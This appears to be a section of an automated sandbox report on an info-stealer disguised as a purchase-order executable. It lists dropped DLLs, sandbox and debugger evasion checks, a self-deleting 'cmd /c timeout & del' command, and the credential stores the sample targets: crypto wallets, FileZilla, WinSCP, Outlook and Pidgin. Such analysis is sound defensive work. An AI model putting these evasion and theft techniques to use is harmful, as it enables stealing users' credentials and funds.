                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\ucrtbase.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dllJump to dropped file

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Program Files\qga\qga.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Program Files\qga\qga.exe
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412040B rdtsc
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00402862 FindFirstFileW,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_004066F3 FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeSystem information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeAPI call chain: ExitProcess graph end node
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                    Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                    Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                    Source: PO No. 3200005919.exe, 00000005.00000002.7238680594.0000000001796000.00000004.00000020.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7239278080.00000000017E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                    Source: PO No. 3200005919.exe, 00000001.00000002.7117283441.0000000010059000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                    Source: PO No. 3200005919.exe, 00000005.00000002.7240956603.0000000003469000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412040B rdtsc
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412C48A mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04140F30 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041432EB mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04140F4D LdrLoadDll,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Users\user\Desktop\PO No. 3200005919.exe C:\Users\user\Desktop\PO No. 3200005919.exe
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de7883c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de22afc.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.PO No. 3200005919.exe.1de27450.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.7268634345.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.7257083339.000000001D3C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO No. 3200005919.exe PID: 5920, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7239043699.00000000017CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jC:\Users\user\AppData\Roaming\Jaxx\Local Storage\\*
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7239043699.00000000017CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jC:\Users\user\AppData\Roaming\Jaxx\Local Storage\\*
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
